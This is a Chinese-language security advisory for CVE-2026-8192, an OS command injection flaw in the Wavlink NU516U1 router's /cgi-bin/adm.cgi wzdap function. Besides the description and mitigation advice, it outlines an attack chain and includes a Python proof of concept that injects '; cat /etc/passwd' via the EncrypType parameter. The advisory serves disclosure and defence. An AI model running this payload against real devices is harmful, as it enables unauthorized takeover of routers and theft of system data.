CVE-2026-8192 Wavlink路由器OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8192

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wavlink NU516U1

漏洞概述

Wavlink NU516U1 M16U1_V240425版本存在操作系统命令注入漏洞，位于/cgi-bin/adm.cgi的wzdap函数中。攻击者可通过操纵EncrypType或wl_Pass参数注入恶意命令，远程执行任意系统代码，影响设备机密性、完整性和可用性。

技术细节

该漏洞源于Wavlink NU516U1设备Web管理接口/cgi-bin/adm.cgi文件中的wzdap函数对用户输入缺乏严格的过滤。当该函数处理网络配置请求时，直接将EncrypType和wl_Pass参数传递给系统Shell执行，未进行安全转义。由于CVSS向量显示攻击复杂度低且无需用户交互，远程攻击者可在仅需低权限的情况下，通过构造包含Shell元字符（如;、|、&等）的恶意数据包，欺骗后端执行任意操作系统命令。成功利用该漏洞可能导致攻击者完全控制设备，窃取敏感信息或破坏服务。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Wavlink NU516U1设备及其Web管理接口。

STEP 2

利用

攻击者向/cgi-bin/adm.cgi发送特制的POST请求，在EncrypType或wl_Pass参数中注入恶意的Shell命令。

STEP 3

执行

由于后端未过滤特殊字符，服务器将恶意参数作为系统命令执行，返回执行结果。

STEP 4

后门/控制

攻击者利用执行的命令下载恶意程序、修改配置或获取敏感数据，确立对设备的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL structure based on vulnerability description
url = "http://<target_ip>/cgi-bin/adm.cgi"

# The vulnerable function is 'wzdap', vulnerable parameters are 'EncrypType' and 'wl_Pass'
# Payload to inject a command (e.g., ping back or cat a file)
payload = "; cat /etc/passwd"

data = {
    "action": "wzdap",
    "EncrypType": payload,
    "wl_Pass": "test"
}

try:
    response = requests.post(url, data=data)
    print("Status Code:", response.status_code)
    print("Response Body:", response.text)
except Exception as e:
    print("An error occurred:", e)

影响范围

Wavlink NU516U1 M16U1_V240425

防御指南

临时缓解措施

在未获得官方补丁前，建议将路由器管理界面仅限制在局域网内访问，切勿将Web管理端口暴露在公网。同时，管理员应密切检查系统日志，检测是否存在针对/cgi-bin/adm.cgi的可疑请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8192
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8192
3 Details https://www.cvedetails.com/cve/CVE-2026-8192/
4 VulDB https://vuldb.com/cve/CVE-2026-8192
5 Link https://github.com/wudipjq/my_vuln/blob/main/Wavlink/vuln_5/5.md
6 Link https://vuldb.com/submit/800731
7 Link https://vuldb.com/vuln/362344
8 Link https://vuldb.com/vuln/362344/cti